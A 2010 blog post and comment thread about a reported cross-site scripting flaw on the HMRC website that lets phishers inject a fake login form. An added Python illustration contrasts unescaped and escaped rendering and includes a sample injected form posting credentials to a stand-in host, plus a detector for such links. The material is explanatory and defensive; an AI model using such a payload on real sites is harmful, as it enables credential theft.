Thursday 18 November 2010

Gone Phishing



My thanks to a loyal reader who sent me a link to an article about a potential security flaw within the HMRC website that may allow phishers to harvest personal information from the unwary user.

Here is a summary of the issue from Concept Business Systems (who also put together the video above):

Summary:
A potentially dangerous cross site scripting vulnerability has been discovered on Her Majesty's Customs & Excise web site.

Description:
This exploit allows anyone to alter content shown on the HMRC.gov.uk search site.

As we've shown below, it's possible to change any part of the site. If exploited, a fraudster could potentially gain access to user accounts by forwarding a malicious link by email, web forum or chat message. HMRC are a prime target for phishing scams, but success rates are limited for a number of reasons. The main problem fraudsters face is trying to convince their victims that the site (and email) is genuine. Quite often, it's simple grammatical / spelling mistakes which give the game away. Unfortunately, some scams are very well executed and can fool even the most careful users.

All phishing scams are dangerous, but this is no ordinary phishing scam and it stands out for two reasons.

1. It's a very high profile site.
2. The fraudster no longer needs to clone the site; these changes can be made to the genuine site... thus hiding the scam behind the correct URL (www.hmrc.gov.uk) and giving the user a false sense of security.

In the video below, we've altered the content and replaced it with a message asking the user to log in in order to perform a tailored search. This message and the form beneath are fake, created purely to collect your username & password. These details are not sent to HMRC's server and are therefore not covered by their SSL certificate (the padlock symbol). Instead, they are forwarded to an address of the hacker's choice.

With phishing scams & identity theft a real cause for concern, this needs to be resolved as a matter of urgency.

If you suspect you've been a victim of such a scam, it's absolutely vital that you change your password as soon as possible, particularly if you're an agent acting on behalf of other clients.

Also, email security.custcon@hmrc.gsi.gov.uk.

DO NOT disclose any personal details in your email... simply outline the type of information you disclosed and to whom.
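As an added illustration (not code from the original post or from Concept Business Systems), this shows the shape of the flaw described above beside its fix: a search page that reflects the query term into the HTML unescaped lets a crafted link inject a fake login form posting elsewhere, whereas HTML-escaping the term renders the same input as inert text. The page template, function names, the sample form and the URLs are all constructed for the example.

```python
import html
from urllib.parse import urlsplit, parse_qs

# Constructed search-results template; {term} is the user-supplied query.
PAGE = "<h1>Search results for: {term}</h1>\n<p>No results found.</p>"


def render_search_vulnerable(term: str) -> str:
    """Reflects the raw term into the page: the reflected-XSS pattern."""
    return PAGE.format(term=term)


def render_search_safe(term: str) -> str:
    """Hardened version: escape <, >, &, quotes so markup becomes plain text."""
    return PAGE.format(term=html.escape(term, quote=True))


def contains_injected_form(rendered: str) -> bool:
    """True if the rendered page acquired a <form> or <script> element."""
    lower = rendered.lower()
    return "<form" in lower or "<script" in lower


def suspicious_search_link(url: str, param: str = "q") -> bool:
    """Flag a link whose search parameter carries HTML tags; handy when
    triaging a reported phishing email or scanning access logs for this bug."""
    values = parse_qs(urlsplit(url).query).get(param, [])
    return any("<" in v and ">" in v for v in values)


# Constructed input of the kind the advisory describes: a fake "please log in"
# form whose action points at a third-party host instead of HMRC.
FAKE_FORM = ('<form action="https://collector.example.invalid/" method="post">'
             'Please log in to perform a tailored search: '
             '<input name="user"><input name="pass" type="password"></form>')

if __name__ == "__main__":
    print(render_search_vulnerable(FAKE_FORM))  # form lands in the page
    print(render_search_safe(FAKE_FORM))        # form shown as literal text
```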

Tax does have to be taxing.

HMRC Is Shite (www.hmrcisshite.com), also available via the domain www.hmrconline.com, is brought to you by www.kenfrost.com "The Living Brand"

15 comments:

  1. The tell-tale sign that you've been directed to a fraudster's site, rather than the real HMRC site, is that the site doesn't crash.

    At least the fraudsters will take less money from your bank account.

  2. 15:34 Haha, if wit were shit you'd be constipated.

  3. fraudsters or HMRC - what's the difference?

  4. I am not sure this is what "Sharing Resources" means.

  5. 15:34 Haha, if wit were shit you'd be constipated.

    Well yeah! I guess HMRC would know all about constipation, wouldn't they. With their superb system and staff, all the information goes in and nothing comes out for 4/5 years. That's why a third of the working population are receiving tax coding notices caused by HMRC errors.

  6. If there is one thing that HMRC is not, it is constipated.

  7. 7.37 The revenue ate my hamster.

  8. So all errors are HMRC's fault? I think not, for example:
    2 callers today have had sizeable underpayments because they had multiple jobs, never completed a P46 and the employer never set up an employment record. Result- Multiple Allowances, Fault- Employer and individual.
    1 caller had an underpayment because they had a company car and fuel which neither they nor the employer informed us of. Result- Untaxed benefits, Fault- Employer and individual.
    1 caller had an underpayment because no State Pension was coded. We had not received the info from the DWP so sent a P161 to the person to get the figures... they never responded: 'didn't see why I had to'. Result- More allowances on private sources than due, Fault- Individual.
    In the last two weeks I have seen no underpayments due to HMRC; if I do, I tell them.

  9. So all errors are HMRC's fault? I think not, for example:
    2 callers today...

    You have been living in a cave, are a totally naive newbie member of staff, or are a total brownnose. Probably all three.
    I speak as one of the (estimated) 1.8 million who have received, or will receive, a bill for underpayment going back to 2006/07, and where I have never had any other income other than employment plus pension, both through PAYE (both long standing and from civil service sources).
    I have been dumped on by the bunch of totally incompetent bastards at HMRC, who don't even have the grace to admit they got it wrong.

  10. You have been living in a cave, are a totally naive newbie member of staff, or are a total brownnose. Probably all three.

    So the previous poster highlighted 4 cases, with detailed explanations, that were not HMRC's fault. You have identified 1 case, without details, that you say was HMRC's fault. That still doesn't back up the claim that all errors are HMRC's fault.

    If it makes you feel any better you are unlikely to receive a bill going back to 06-07 if it is all under PAYE.

    http://www.publications.parliament.uk/pa/cm201011/cmselect/cmpubacc/uc502-ii/uc50201.htm

  11. Anon @ 19 November 2010 11:29, I think you sum up HMRC's attitude fairly well. This thread is about website security and you are yapping on about whose fault it is that someone's tax is not in order. Maybe if you concentrated on the actual issue being discussed your input would be more valid.

  12. I was responding to 7:37 and making a valid point to his/her misinformed statement. The whole thread and comments are again HMRC bashing. HMRC did not design the website; how many issues do Microsoft have, and they are a computer company?
    Perhaps if you were less arrogant your objection to my comments would be more valid.

  13. I was responding to 7:37 and making a valid point to his/her misinformed statement.
    Shame on 7:37 for causing this trouble.

    The whole thread and comments are again HMRC bashing.
    I think you will find that most of this site does that. It is why it exists.

    HMRC did not design the website
    Lame excuses as usual.

    How many issues do Microsoft have, and they are a computer company?
    I use a mac so could not care less.

    Perhaps if you were less arrogant your objection to my comments would be more valid.
    Probably correct but who gives a toss.

  14. Wow you have torn apart my statement and humbled me with your decisively eloquent points.

  15. At least the fraudsters will take less money from your bank account.

    And undoubtedly will be less arsy and arrogant in any exchanges they have with you. Never mind, roll on the next staff survey results (which HMRC will no doubt try not to publish again). We can then all see what a bunch of jobsworth twats we are all supporting with our taxes.
